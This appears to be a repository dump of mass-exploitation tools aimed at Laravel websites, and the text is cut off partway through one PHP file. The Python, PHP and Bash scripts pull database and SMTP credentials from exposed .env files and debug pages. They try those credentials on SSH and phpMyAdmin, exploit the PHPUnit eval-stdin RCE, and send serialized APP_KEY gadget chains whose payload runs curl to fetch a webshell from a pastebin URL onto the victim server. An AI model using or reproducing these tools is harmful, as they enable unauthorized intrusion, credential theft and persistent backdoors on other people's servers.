├── README.md ├── laravel-crackssh.py ├── laravel-debugbar.py ├── laravel-debugcheck.sh ├── laravel-phpmyadmin.py ├── laravel-phpunit.py ├── laravel-rce-mass.php ├── laravel-rce.php ├── laravel-sitecheck.sh ├── laravel-sitechecker.php ├── laravel-sitechecker.py ├── laravel-smtp-ssh-cpanel-v2.py ├── laravel-smtp-ssh-cpanel.py └── parallel.md /README.md: -------------------------------------------------------------------------------- 1 | # LARAPLER - Laravel Random Exploit 2 | - Requirements : Python2, Python3, PHP-cli, PHP-curl, Bash, Parallel
3 | - How to Install Parallel check Here
4 | - If Python reports `no module named xxx`, install the missing module with ```pip install modulename``` 5 |

Another Exploit

6 | - Laravel Debug RCE : Here
7 | - Laravel Exploit Here
8 | - LaCrot Here
9 | - Laravel Checker (exe) Here
10 | - Laravel Scanner (exe) Here / Mirror
11 | - Laravel Scanner (bash) Here
12 | - CannabisLaravelEnv Here
13 |

Thanks to all the tool creators | Copyright belongs to the respective tool creators

14 | -------------------------------------------------------------------------------- /laravel-crackssh.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import paramiko 3 | import re, sys 4 | from concurrent.futures import ThreadPoolExecutor 5 | 6 | def bann(): 7 | x = """ 8 | [+] SSH Cracker [+] 9 | [-] Cracker From Laravel Config [-]\n 10 | """ 11 | print(x) 12 | 13 | class Oke: 14 | def __init__(self, url, resp): 15 | self.url = url 16 | self.resp = resp 17 | self.ip = self.url.split('/')[2] 18 | self.port = 22 19 | 20 | def getup(self): 21 | try: 22 | if 'DB_USERNAME=' in self.resp: 23 | u = re.findall('\nDB_USERNAME=(.*?)\n', self.resp)[0] 24 | p = re.findall('\nDB_PASSWORD=(.*?)\n', self.resp)[0] 25 | elif 'DB_USERNAME' in self.resp: 26 | u = re.findall('DB_USERNAME<\/td>\s+(.*?)<\/span>', self.resp)[0] 27 | p = re.findall('DB_PASSWORD<\/td>\s+(.*?)<\/span>', self.resp)[0] 28 | else: 29 | u = 'root' 30 | p = 'password123' 31 | except: 32 | u = 'root' 33 | p = 'password123' 34 | finally: 35 | return u, p 36 | 37 | def connect(self): 38 | try: 39 | user, passwd = self.getup() 40 | ssh = paramiko.SSHClient() 41 | ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) 42 | ssh.connect(self.ip, self.port, user, passwd) 43 | tes = ssh.exec_command('ls') 44 | saved = '{}|{}|{}|{}'.format(self.ip, str(self.port), user, passwd) 45 | if tes: 46 | print('[+] Success login > {} [+]'.format(saved)) 47 | svw = open('sshlog.txt', 'a') 48 | svw.write(saved+'\n') 49 | svw.close() 50 | except Exception as e: 51 | print(str(e)) 52 | 53 | def main(url): 54 | resp = False 55 | vuln = url+'/.env' 56 | try: 57 | req = requests.get(vuln, timeout=14).text 58 | if 'DB_USERNAME' in req: 59 | resp = req 60 | else: 61 | req = requests.post(url, data={1: 1}, timeout=7).text 62 | if 'APP_KEY' in req: 63 | resp = req 64 | except Exception: 65 | print('[*] Cant Connect To Sites > {} [*]'.format(url)) 66 | if resp: 67 | iz = 
Oke(url, resp) 68 | iz.connect() 69 | else: 70 | print('[-] Not Laravel > {} [-]'.format(url)) 71 | 72 | 73 | if __name__ == '__main__': 74 | if len(sys.argv) != 2: 75 | print('Usage : python3 {} yourlist.txt'.format(sys.argv[0])) 76 | else: 77 | bann() 78 | target = open(sys.argv[1], 'r').read().splitlines() 79 | if '://' not in target[0] or '://' not in target[1]: 80 | target = ['http://'+xx for xx in target] 81 | else: 82 | pass 83 | with ThreadPoolExecutor(max_workers=10) as exc: 84 | exc.map(main, target) 85 | -------------------------------------------------------------------------------- /laravel-debugbar.py: -------------------------------------------------------------------------------- 1 | import os, requests, time 2 | from multiprocessing.dummy import Pool as ThreadPool 3 | from multiprocessing import Pool 4 | import threading 5 | import sys 6 | from colorama import Fore, Style 7 | 8 | 9 | def screen_clear(): 10 | _ = os.system('cls') 11 | 12 | 13 | bl = Fore.BLUE 14 | wh = Fore.WHITE 15 | gr = Fore.GREEN 16 | red = Fore.RED 17 | res = Style.RESET_ALL 18 | yl = Fore.YELLOW 19 | 20 | headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0'} 21 | 22 | def debugbar (star): 23 | if "://" in star: 24 | star = star 25 | else: 26 | star = "http://" + star 27 | star = star.replace('\n', '').replace('\r', '') 28 | url = star + "/" 29 | check = requests.get(url, headers=headers, timeout=3) 30 | resp = check.text 31 | try: 32 | if "PhpDebugBar.DebugBar" in resp: 33 | print(f"Debugbar {gr}OK{res} => {star}\n") 34 | mrigel = open("found.txt", "a") 35 | mrigel.write(f'{star}/_debugbar/open?method=POST&max=1000&offset=0\n') 36 | else: 37 | print(f"{red}Not Found{res} Debugbar => {star}\n") 38 | except: 39 | pass 40 | 41 | 42 | def filter(star): 43 | try: 44 | debugbar(star) 45 | except: 46 | pass 47 | 48 | 49 | def main(): 50 | print(f'''{gr}[ DEBUDBAR CHECKER ] | [ BY XNXXVIDOES ]''') 51 | list = input(f"{gr}Give Me 
Your List.txt/{red}XNXXVIDOES> {gr}${res} ") 52 | star = open(list, 'r').readlines() 53 | try: 54 | ThreadPool = Pool(50) 55 | ThreadPool.map(filter, star) 56 | ThreadPool.close() 57 | ThreadPool.join() 58 | except: 59 | pass 60 | 61 | if __name__ == '__main__': 62 | screen_clear() 63 | main() 64 | -------------------------------------------------------------------------------- /laravel-debugcheck.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # Mass Laravel Debug Checker 3 | # Created By Im-Hanzou 4 | # Using GNU Parallel 5 | # Usage: bash file.sh list.txt thread 6 | 7 | yellow='\033[0;33m' 8 | cat << "EOF" 9 | _ _ 10 | | | __ _ _ _ __ _ __ __ ___ | | 11 | | |__ / _` || '_|/ _` |\ V // -_)| | 12 | |____|\__,_||_| \__,_| \_/ \___||_| 13 | 14 | EOF 15 | printf "${yellow}Mass Laravel Debug Checker\nGithub : im-hanzou\nUsage: bash file.sh list.txt thread\nExample: bash laravel-debugcheck.sh list.txt 50\n\n\n" 16 | 17 | exploit(){ 18 | classic='\033[0m' 19 | red='\e[41m' 20 | green='\e[42m' 21 | target=$1 22 | thread=$2 23 | 24 | if [[ $(curl --silent --connect-timeout 10 --max-time 10 --insecure $target -d '[]') =~ 'APP_KEY' || $(curl --silent --connect-timeout 10 --max-time 10 --insecure $target -d '[]') =~ 'APP_KEY' ]]; 25 | then 26 | printf "${green}[ Vuln ]${classic} => [ $target | Laravel Debug ] \n"; 27 | printf "$target\n" >> vuln.txt 28 | else 29 | printf "${red}[ Not Vuln ]${classic} => $target \n"; 30 | printf "$target\n" >> bad.txt 31 | fi 32 | } 33 | 34 | export --no-notice -f exploit 35 | parallel -j $2 exploit :::: $1 36 | 37 | printf "\033[0;36mCheck Vuln : vuln.txt\n"; 38 | printf "\033[0;36mBad Site : bad.txt\n"; 39 | -------------------------------------------------------------------------------- /laravel-phpmyadmin.py: -------------------------------------------------------------------------------- 1 | #just for fun 2 | import requests as p 3 | import re 4 | from threading import Thread 5 | 
import os 6 | 7 | pala = {'User-Agent': 'Mozilla/5.0 (Linux; Android 4.2.1; en-us; Nexus 5 Build/JOP40D) AppleWebKit/535.19 (KHTML, like Gecko; googleweblight) Chrome/38.0.1025.166 Mobile Safari/535.19'} 8 | 9 | #banner 10 | def ban(): 11 | if os.name == 'nt': os.system('cls') 12 | else: os.system('clear') 13 | xxx = """ 14 | [+] Mass Phpmyadmin Login Scanner [+] 15 | [+] From env configuration [+] 16 | [+] Created By FaizGanz [+]\n 17 | """ 18 | print(xxx) 19 | 20 | #CekLogin 21 | def login(url, usr, pwd): 22 | urllog = url+'/phpmyadmin/' 23 | try: 24 | reqToken = p.get(urllog, headers=pala).text 25 | token = re.findall('name="token" value="(.*?)"', reqToken)[0] 26 | except: 27 | token = '2295ef2ef3886e2a25cb942a9c104bf3' 28 | try: 29 | dataLog = { 30 | 'pma_username': usr, 31 | 'pma_password': pwd, 32 | 'server': '1', 33 | 'target': 'index.php', 34 | 'token': token 35 | } 36 | cekLog = p.post(urllog, data=dataLog, headers=pala) 37 | if 'Log out' in cekLog.text: 38 | print('[+] Success Login {} > {} > {} [+]'.format(url, usr, pwd)) 39 | svwork = open('successlogin.txt', 'a') 40 | svwork.write(urllog+'|'+usr+'|'+pwd+'\n') 41 | svwork.close() 42 | else: 43 | print('[-] Cant Login {} > {} > {} [-]'.format(url, usr, pwd)) 44 | svwork = open('cantlogin.txt', 'a') 45 | svwork.write(urllog+'|'+usr+'|'+pwd+'\n') 46 | svwork.close() 47 | except Exception: 48 | print('[*] Cant Access sites > {} [*]'.format(url)) 49 | 50 | #Find User/Pass 51 | def getup(url, text): 52 | try: 53 | if 'DB_USERNAME=' in text: 54 | user = re.findall('\nDB_USERNAME=(.*?)\n', text)[0] 55 | passwd = re.findall('\nDB_PASSWORD=(.*?)\n', text)[0] 56 | elif 'DB_USERNAME' in text: 57 | user = re.findall('DB_USERNAME<\/td>\s+(.*?)<\/span>', text)[0] 58 | passwd = re.findall('DB_PASSWORD<\/td>\s+(.*?)<\/span>', text)[0] 59 | else: 60 | print('[-] Cant Get Username/Password [-]') 61 | except: 62 | print('[*] Something wrong [*]') 63 | finally: 64 | login(url, user, passwd) 65 | 66 | #cek url 67 | def 
cek(url): 68 | purl = url+'/phpmyadmin/' 69 | logurl = False 70 | resp = False 71 | try: 72 | Cekphpmyadmin = p.get(purl, headers=pala, timeout=14) 73 | if 'pma_username' in Cekphpmyadmin.text: 74 | logurl = url 75 | else: 76 | logurl = False 77 | except Exception: 78 | print('[*] Cant Acces sites > {} [*]'.format(url)) 79 | try: 80 | envcek = p.get(url+'/.env', headers=pala, timeout=14).text 81 | if 'DB_PASSWORD=' in envcek: 82 | resp = envcek 83 | else: 84 | debugcek = p.post(url, data={1: 1}, headers=pala, timeout=7).text 85 | if 'DB_PASSWORD' in debugcek: 86 | resp = debugcek 87 | if logurl and resp: 88 | getup(logurl, resp) 89 | elif not logurl and resp: 90 | print('[-] Cant get phpmyadmin login > {} [-]'.format(url)) 91 | except: 92 | print('[*] Cant Access sites > {} [*]'.format(url)) 93 | 94 | 95 | if __name__ == '__main__': 96 | ban() 97 | urlt = open(input('[+] Url List ~# '), 'r').read().split('\n') 98 | for tar in urlt: 99 | if '://' in tar: pass 100 | else: tar = 'http://'+tar 101 | t = Thread(target=cek, args=(tar,)) 102 | t.start() 103 | -------------------------------------------------------------------------------- /laravel-phpunit.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | 3 | banner = """ 4 | RpQ#AdM 5 | EQ#d@F Xe Q 6 | MgKG eeeXX eW 7 | BNKGXeeX eW BEpqNg#mbAAAAbm#WQpB 8 | RNDUeeX XFDPU eeeeeeeeeeeeeeeee U@ANB 9 | MAFeeX XeU@dKKKdD@GU XeXX XXeeUW 10 | qDXeX XUN RBMNmK@F UeA 11 | M8Xe XFp M XM 12 | RKXe XM R be e# 13 | qFe eb p Xe# 14 | #XX XFR BGX eFQ 15 | be eb EPX e AB 16 | me XXXXXXXX p NUX eXDM 17 | NX XXeeeeXX UFGPPGG @ pdXXXee dM R R 18 | BFX X G@dbgNqpEBR RBE RQDXee F8mE EdGE Rdp 19 | beXeXX XFp pgD TXPAWMR Bb XeA dFR 20 | BXXPbqdX XM R pgDFXXPbQB pbUeX X@ gTm 21 | qbM 8X XFWKPUDR pgDUX PbQB BWD eX X8 geFB 22 | me eeX Tb pWdFeXPbQB BpQm8Uee eb beXQ 23 | RGX eD BNKP Te8WB BqgA8GU eeeX XM PXem 24 | BU em p#8UeXeXKp Mm8UXeeXXX eD ge em 25 | De eG pm@ eXX XPM EmPXeXX M 
N eW 26 | BKUeeeeeXdEN8 eX e8R RbUeX U em BKXX XUB 27 | BQgmmNpWPeX XFB R8eXXXeeeeeeeeeXX e@R QFe XeW 28 | p@eX eK QTXUPDAb#ggg#bK8G ee XUp gXX XUN 29 | R QXe XK BgqB REqAU X XN Ne XPB 30 | RFX Ue N RRRRRRR RND eXG eF#R FX p 31 | E XK#GeUKNB RpgD TTUKq MKUTFK E 32 | E eXXX XW pm@UUGDbgNqqqQW#K@UeTeGKNB BgFe eD 33 | RGe8qQGeX eb RMWA8PGFU UFPdmQp R R 8X ePp 34 | qQ RmUeX e@q RBBR MgM EU XeUKp 35 | BbUeX XXDQ BQKGDM RFX XeUbE 36 | B#PXeX XXGKNpR BpQ#KPXe@Q #TXeUbB 37 | qKFXeX XeX FP8ddKdD@PF eTT KM #FmB 38 | RQAPUXeeeeeeeeeeeeeeXFdNR 39 | EQ#A8PGFFFFG@DbWMR 40 | RBBBRR 41 | 42 | ./Xi4u7 - idiot people 43 | """ 44 | import requests, re, sys, threading 45 | from time import sleep 46 | from urlparse import urlparse 47 | requests.packages.urllib3.disable_warnings() 48 | import threading, time, random 49 | from Queue import Queue 50 | from threading import * 51 | screenlock = Semaphore(value=1) 52 | 53 | vuln = 0 54 | bad = 0 55 | shel = 0 56 | smtp = 0 57 | 58 | def get_smtp(url): 59 | global smtp 60 | fin = url.replace("/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "/.env") 61 | try: 62 | spawn = requests.get(fin, timeout=15, verify=False).text 63 | if "MAIL_HOST" in spawn and "MAIL_USERNAME" in spawn: 64 | host = re.findall("\nMAIL_HOST=(.*?)\n", spawn)[0] 65 | port = re.findall("\nMAIL_PORT=(.*?)\n", spawn)[0] 66 | user = re.findall("\nMAIL_USERNAME=(.*?)\n", spawn)[0] 67 | pasw = re.findall("\nMAIL_PASSWORD=(.*?)\n", spawn)[0] 68 | if user == "null" or pasw == "null" or user == "" or pasw == "": 69 | pass 70 | if "mailtrap" in user: 71 | pass 72 | else: 73 | screenlock.acquire() 74 | print("\033[44m -- SMTP -- \033[0m "+fin) 75 | smtp = smtp + 1 76 | file = open("smtp.txt","a") 77 | geturl = fin.replace(".env","") 78 | pack = geturl+"|"+host+"|"+port+"|"+user+"|"+pasw 79 | file.write(pack+"\n") 80 | file.close() 81 | screenlock.release() 82 | except KeyboardInterrupt: 83 | print("Closed") 84 | exit() 85 | except: 86 | pass 87 | 88 | def exploit(url): 89 | 
get_smtp(url) 90 | global vuln 91 | global bad 92 | global shel 93 | try: 94 | data = "" 95 | text = requests.get(url, data=data, timeout=15, verify=False) 96 | if "phpinfo" in text.text: 97 | screenlock.acquire() 98 | print("\033[42;1m -- VULN -- \033[0m "+url) 99 | screenlock.release() 100 | vuln = vuln + 1 101 | wre = open("vulnerable.txt", "a") 102 | wre.write(url+"\n") 103 | wre.close() 104 | data2 = "'.base64_decode('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')); ?>" 105 | spawn = requests.get(url, data=data2, timeout=15, verify=False) 106 | if "Sukses" in spawn.text: 107 | screenlock.acquire() 108 | print(" \033[42;1m | \033[0m Shell Spawned") 109 | screenlock.release() 110 | shel = shel + 1 111 | wrs = open("shells.txt", "a") 112 | pathshell = url.replace("eval-stdin.php","as.php") 113 | wrs.write(pathshell+"\n") 114 | wrs.close() 115 | else: 116 | screenlock.acquire() 117 | print(" \033[41;1m | \033[0m Fail Spawn Shell") 118 | screenlock.release() 119 | else: 120 | screenlock.acquire() 121 | print("\033[41;1m -- BAAD -- \033[0m "+url) 122 | screenlock.release() 123 | bad = bad + 1 124 | except KeyboardInterrupt: 125 | print("Closed") 126 | exit() 127 | except Exception as err: 128 | screenlock.acquire() 129 | print("\033[43;1m -- ERRN -- \033[0m "+url) 130 | screenlock.release() 131 | bad = bad + 1 132 | try: 133 | list = sys.argv[1] 134 | except: 135 | print "\033[31;1m"+banner+"\033[0m" 136 | print("\n\n# python2.7 l-evil.py list.txt") 137 | exit() 138 | asu = open(list).read().splitlines() 139 | jobs = Queue() 140 | def do_stuff(q): 141 | while not q.empty(): 142 | i = q.get() 143 | exp = "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" 144 | if i.startswith("http"): 145 | url = i+exp 146 | exploit(url) 147 | else: 148 | url = "http://"+i+exp 149 | exploit(url) 150 | q.task_done() 151 | 152 | for trgt in asu: 153 | jobs.put(trgt) 154 | 155 | for i in range(30): # Default 10 Thread Ganti Aja Kalau Mau 156 | worker = 
threading.Thread(target=do_stuff, args=(jobs,)) 157 | worker.start() 158 | jobs.join() 159 | print("\033[44mSMTP : \033[0m "+str(smtp)) 160 | print("\033[42;1mSpawned Shell : \033[0m "+str(shel)) 161 | print("\033[43;1mExploited : \033[0m "+str(vuln)) 162 | print("\033[41;1mNot Vulnerable : \033[0m "+str(bad)) 163 | -------------------------------------------------------------------------------- /laravel-rce-mass.php: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env php 2 | "; 46 | switch ($method) 47 | { 48 | case 1: 49 | $payload = 'O:40:"Illuminate\Broadcasting\PendingBroadcast":2:{s:9:"' . "\x00" . '*' . "\x00" . 'events";O:15:"Faker\Generator":1:{s:13:"' . "\x00" . '*' . "\x00" . 'formatters";a:1:{s:8:"dispatch";s:' . strlen($func) . ':"' . $func . '";}}s:8:"' . "\x00" . '*' . "\x00" . 'event";s:' . strlen($command) . ':"' . $command . '";}'; 50 | break; 51 | case 2: 52 | $payload = 'O:40:"Illuminate\Broadcasting\PendingBroadcast":2:{s:9:"' . "\x00" . '*' . "\x00" . 'events";O:28:"Illuminate\Events\Dispatcher":1:{s:12:"' . "\x00" . '*' . "\x00" . 'listeners";a:1:{s:' . strlen($command) . ':"' . $command . '";a:1:{i:0;s:' . strlen($func) . ':"' . $func . '";}}}s:8:"' . "\x00" . '*' . "\x00" . 'event";s:' . strlen($command) . ':"' . $command . '";}'; 53 | break; 54 | case 3: 55 | $payload = 'O:40:"Illuminate\Broadcasting\PendingBroadcast":1:{s:9:"' . "\x00" . '*' . "\x00" . 'events";O:39:"Illuminate\Notifications\ChannelManager":3:{s:6:"' . "\x00" . '*' . "\x00" . 'app";s:' . strlen($command) . ':"' . $command . '";s:17:"' . "\x00" . '*' . "\x00" . 'defaultChannel";s:1:"x";s:17:"' . "\x00" . '*' . "\x00" . 'customCreators";a:1:{s:1:"x";s:' .strlen($func) . ':"' . $func . '";}}}'; 56 | break; 57 | case 4: 58 | $payload = 'O:40:"Illuminate\Broadcasting\PendingBroadcast":2:{s:9:"' . "\x00" . '*' . "\x00" . 'events";O:31:"Illuminate\Validation\Validator":1:{s:10:"extensions";a:1:{s:0:"";s:' . strlen($func) . ':"' . 
$func . '";}}s:8:"' . "\x00" . '*' . "\x00" . 'event";s:' . strlen($command) . ':"' . $command . '";}'; 59 | break; 60 | case 5: 61 | $payload = 'O:40:"Illuminate\Broadcasting\PendingBroadcast":2:{s:9:"' . "\x00" . '*' . "\x00" . 'events";O:25:"Illuminate\Bus\Dispatcher":1:{s:16:"' . "\x00" . '*' . "\x00" . 'queueResolver";a:2:{i:0;O:25:"Mockery\Loader\EvalLoader":0:{}i:1;s:4:"load";}}s:8:"' . "\x00" . '*' . "\x00" . 'event";O:38:"Illuminate\Broadcasting\BroadcastEvent":1:{s:10:"connection";O:32:"Mockery\Generator\MockDefinition":2:{s:9:"' . "\x00" . '*' . "\x00" . 'config";O:35:"Mockery\Generator\MockConfiguration":1:{s:7:"' . "\x00" . '*' . "\x00" . 'name";s:7:"abcdefg";}s:7:"' . "\x00" . '*' . "\x00" . 'code";s:'. strlen($p) . ':"' . $p . '";}}}'; 62 | break; 63 | case 6: 64 | $payload = 'O:29:"Illuminate\Support\MessageBag":2:{s:11:"' . "\x00" . '*' . "\x00" . 'messages";a:0:{}s:9:"' . "\x00" . '*' . "\x00" . 'format";O:40:"Illuminate\Broadcasting\PendingBroadcast":2:{s:9:"' . "\x00" . '*' . "\x00" . 'events";O:25:"Illuminate\Bus\Dispatcher":1:{s:16:"' . "\x00" . '*' . "\x00" . 'queueResolver";a:2:{i:0;O:25:"Mockery\Loader\EvalLoader":0:{}i:1;s:4:"load";}}s:8:"' . "\x00" . '*' . "\x00" . 'event";O:38:"Illuminate\Broadcasting\BroadcastEvent":1:{s:10:"connection";O:32:"Mockery\Generator\MockDefinition":2:{s:9:"' . "\x00" . '*' . "\x00" . 'config";O:35:"Mockery\Generator\MockConfiguration":1:{s:7:"' . "\x00" . '*' . "\x00" . 'name";s:7:"abcdefg";}s:7:"' . "\x00" . '*' . "\x00" . 'code";s:' . strlen($p) . ':"' . $p . 
'";}}}}'; 65 | break; 66 | } 67 | return base64_encode($payload); 68 | } 69 | } 70 | 71 | class Requester 72 | { 73 | 74 | public function Requests($url, $postdata = null, $headers = null, $follow = true) 75 | { 76 | $ch = curl_init(); 77 | curl_setopt($ch, CURLOPT_URL, $url); 78 | curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 79 | curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); 80 | curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); 81 | curl_setopt ($ch, CURLOPT_TIMEOUT, 15); 82 | curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 15); 83 | curl_setopt($ch, CURLOPT_HEADER, 1); 84 | if (!empty($headers) && $headers != null) 85 | { 86 | curl_setopt($ch, CURLOPT_HTTPHEADER, $headers); 87 | } 88 | if (!empty($postdata) && $postdata != null) 89 | { 90 | curl_setopt($ch, CURLOPT_POST, 1); 91 | curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata); 92 | } 93 | if ($follow) 94 | { 95 | curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); 96 | } 97 | $data = curl_exec($ch); 98 | $header_size = curl_getinfo($ch, CURLINFO_HEADER_SIZE); 99 | $status_code = curl_getinfo($ch, CURLINFO_HTTP_CODE); 100 | $head = substr($data, 0, $header_size); 101 | $body = substr($data, $header_size); 102 | return json_decode(json_encode(array( 103 | 'status_code' => $status_code, 104 | 'headers' => $this->HeadersToArray($head) , 105 | 'body' => $body 106 | ))); 107 | } 108 | public function HeadersToArray($str) 109 | { 110 | $str = explode("\r\n", $str); 111 | $str = array_splice($str, 0, count($str) - 1); 112 | $output = []; 113 | foreach ($str as $item) 114 | { 115 | if ($item === '' || empty($item)) continue; 116 | $index = stripos($item, ": "); 117 | $key = substr($item, 0, $index); 118 | $key = strtolower(str_replace('-', '_', $key)); 119 | $value = substr($item, $index + 2); 120 | if (@$output[$key]) 121 | { 122 | if (strtolower($key) === 'set_cookie') 123 | { 124 | $output[$key] = $output[$key] . "; " . 
$value; 125 | } 126 | else 127 | { 128 | $output[$key] = $output[$key]; 129 | } 130 | } 131 | else 132 | { 133 | $output[$key] = $value; 134 | } 135 | } 136 | return $output; 137 | } 138 | } 139 | 140 | class Exploit extends Requester 141 | { 142 | public $url; 143 | public $vuln; 144 | public $app_key; 145 | public $smtp; 146 | public function __construct($url) 147 | { 148 | $this->url = $url; 149 | $this->vuln = null; 150 | $this->app_key = null; 151 | $this->smtp = []; 152 | } 153 | public function getAppKeyEnv() 154 | { 155 | $req = parent::Requests($this->url . "/.env", null, null, $follow = false); 156 | if (preg_match('/APP_KEY/', $req->body)) 157 | { 158 | $loh = preg_replace('/\n/', '##', $req->body); 159 | preg_match_all('/APP_KEY=(.*?)##/', $loh, $matches, PREG_SET_ORDER, 0); 160 | $this->app_key = $matches[0][1]; 161 | preg_match_all('/MAIL_HOST=(.*?)##/', $loh, $mh, PREG_SET_ORDER, 0); 162 | preg_match_all('/MAIL_PORT=(.*?)##/', $loh, $mp, PREG_SET_ORDER, 0); 163 | preg_match_all('/MAIL_USERNAME=(.*?)##/', $loh, $mu, PREG_SET_ORDER, 0); 164 | preg_match_all('/MAIL_PASSWORD=(.*?)##/', $loh, $mw, PREG_SET_ORDER, 0); 165 | $this->smtp['HOST'] = ($mh[0][1]) ? $mh[0][1] : ''; 166 | $this->smtp['PORT'] = ($mp[0][1]) ? $mp[0][1] : ''; 167 | $this->smtp['USER'] = ($mu[0][1]) ? $mu[0][1] : ''; 168 | $this->smtp['PASS'] = ($mw[0][1]) ? 
$mw[0][1] : ''; 169 | } 170 | } 171 | public function getAppKey() 172 | { 173 | $req = parent::Requests($this->url, 'a=a', null, false); 174 | if (preg_match('/APP_KEY<\/td>/', $req->body)) 175 | { 176 | preg_match_all('/APP_KEY<\/td>\s+(.*?)<\/span>/', $req->body, $matches, PREG_SET_ORDER, 0); 177 | preg_match_all('/MAIL_HOST<\/td>\s+(.*?)<\/span>/', $req->body, $mh, PREG_SET_ORDER, 0); 178 | preg_match_all('/MAIL_PORT<\/td>\s+(.*?)<\/span>/', $req->body, $mp, PREG_SET_ORDER, 0); 179 | preg_match_all('/MAIL_USERNAME<\/td>\s+(.*?)<\/span>/', $req->body, $mu, PREG_SET_ORDER, 0); 180 | preg_match_all('/MAIL_PASSWORD<\/td>\s+(.*?)<\/span>/', $req->body, $mw, PREG_SET_ORDER, 0); 181 | $this->app_key = ($matches[0][1]) ? $matches[0][1] : null; 182 | $this->smtp['HOST'] = ($mh[0][1]) ? $mh[0][1] : ''; 183 | $this->smtp['PORT'] = ($mp[0][1]) ? $mp[0][1] : ''; 184 | $this->smtp['USER'] = ($mu[0][1]) ? $mu[0][1] : ''; 185 | $this->smtp['PASS'] = ($mw[0][1]) ? $mw[0][1] : ''; 186 | } 187 | else 188 | { 189 | $this->getAppKeyEnv($this->url); 190 | } 191 | } 192 | } 193 | 194 | parse_str(implode("&", array_slice($argv, 1)), $_GET); 195 | if (!$_GET['list']) return 'Usage: php ' . $argv[0] . ' list=list.txt'; 196 | $urls = $_GET['list']; 197 | $read = array_unique(explode("\n", str_replace("\r", "", file_get_contents($urls)))); 198 | 199 | foreach($read as $cok) { 200 | if (empty($cok) || $cok == '') continue; 201 | $req = new Requester(); 202 | $wibu = new Exploit($cok); 203 | $func = new Func_(); 204 | $wibu->getAppKey(); 205 | if (!empty($wibu->app_key) || $wibu->app_key != null) { 206 | $app = str_replace('base64:', '', $wibu->app_key); 207 | $payload = base64_encode('_ALL_WE_KNOW_'); 208 | $payload = $func->GeneratePayload("echo base64_decode('{$payload}');", 'system', 5); 209 | $serialize = $func->Serialize($app, $payload); 210 | $header = array( 211 | 'Cookie: XSRF-TOKEN=' . 
$serialize 212 | ); 213 | $bre = $req->Requests($cok, null, $header, false); 214 | if ($wibu->smtp['HOST'] != '' || !empty($wibu->smtp['HOST'])) { 215 | $data = "{$wibu->smtp['HOST']}|{$wibu->smtp['PORT']}|{$wibu->smtp['USER']}|{$wibu->smtp['PASS']}"; 216 | Save('SMTP.txt', $data); 217 | } 218 | if (preg_match('/_ALL_WE_KNOW_/', $bre->body)) { 219 | echo $cok . " ===> "; 220 | $payload = $func->GeneratePayload("echo system('curl https://pastebin.com/raw/8FHzfDCu -k -o '.public_path().'/c.php'); echo 'Rintod';", 'system', 5); 221 | $serialize = $func->Serialize($app, $payload); 222 | $header = array( 223 | 'Cookie: XSRF-TOKEN=' . $serialize 224 | ); 225 | $bro = $req->Requests($cok, null, $header, false); 226 | if (preg_match('/Rintod/', $bro->body)) { 227 | $njir = $req->Requests($cok . "/c.php", null, null, false); 228 | if (preg_match('/azzatssins/', $njir->body)) { 229 | echo 'SHELL OK ===> ' . $cok . '/c.php?0=ls' . PHP_EOL; 230 | Save('SHELL.txt', $cok . '/c.php?0=ls'); 231 | } else { 232 | echo 'SHELL FAIL! But RCE OK! Maybe Permission Denied For Uploading Shell!!!' . PHP_EOL; 233 | Save('MANUAL.txt', $cok); 234 | } 235 | } else { 236 | echo 'Failed Upload Shell! But RCE OK!' . PHP_EOL; 237 | Save('MANUAL.txt', $cok); 238 | } 239 | } else { 240 | echo $cok . " ===> NOT VULN" . PHP_EOL; 241 | } 242 | } else { 243 | echo $cok . " ===> NO APP_KEY!!!!" . PHP_EOL; 244 | } 245 | } 246 | -------------------------------------------------------------------------------- /laravel-rce.php: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env php 2 | "; 40 | switch ($method) 41 | { 42 | case 1: 43 | $payload = 'O:40:"Illuminate\Broadcasting\PendingBroadcast":2:{s:9:"' . "\x00" . '*' . "\x00" . 'events";O:15:"Faker\Generator":1:{s:13:"' . "\x00" . '*' . "\x00" . 'formatters";a:1:{s:8:"dispatch";s:' . strlen($func) . ':"' . $func . '";}}s:8:"' . "\x00" . '*' . "\x00" . 'event";s:' . strlen($command) . ':"' . $command . 
'";}'; 44 | break; 45 | case 2: 46 | $payload = 'O:40:"Illuminate\Broadcasting\PendingBroadcast":2:{s:9:"' . "\x00" . '*' . "\x00" . 'events";O:28:"Illuminate\Events\Dispatcher":1:{s:12:"' . "\x00" . '*' . "\x00" . 'listeners";a:1:{s:' . strlen($command) . ':"' . $command . '";a:1:{i:0;s:' . strlen($func) . ':"' . $func . '";}}}s:8:"' . "\x00" . '*' . "\x00" . 'event";s:' . strlen($command) . ':"' . $command . '";}'; 47 | break; 48 | case 3: 49 | $payload = 'O:40:"Illuminate\Broadcasting\PendingBroadcast":1:{s:9:"' . "\x00" . '*' . "\x00" . 'events";O:39:"Illuminate\Notifications\ChannelManager":3:{s:6:"' . "\x00" . '*' . "\x00" . 'app";s:' . strlen($command) . ':"' . $command . '";s:17:"' . "\x00" . '*' . "\x00" . 'defaultChannel";s:1:"x";s:17:"' . "\x00" . '*' . "\x00" . 'customCreators";a:1:{s:1:"x";s:' .strlen($func) . ':"' . $func . '";}}}'; 50 | break; 51 | case 4: 52 | $payload = 'O:40:"Illuminate\Broadcasting\PendingBroadcast":2:{s:9:"' . "\x00" . '*' . "\x00" . 'events";O:31:"Illuminate\Validation\Validator":1:{s:10:"extensions";a:1:{s:0:"";s:' . strlen($func) . ':"' . $func . '";}}s:8:"' . "\x00" . '*' . "\x00" . 'event";s:' . strlen($command) . ':"' . $command . '";}'; 53 | break; 54 | case 5: 55 | $payload = 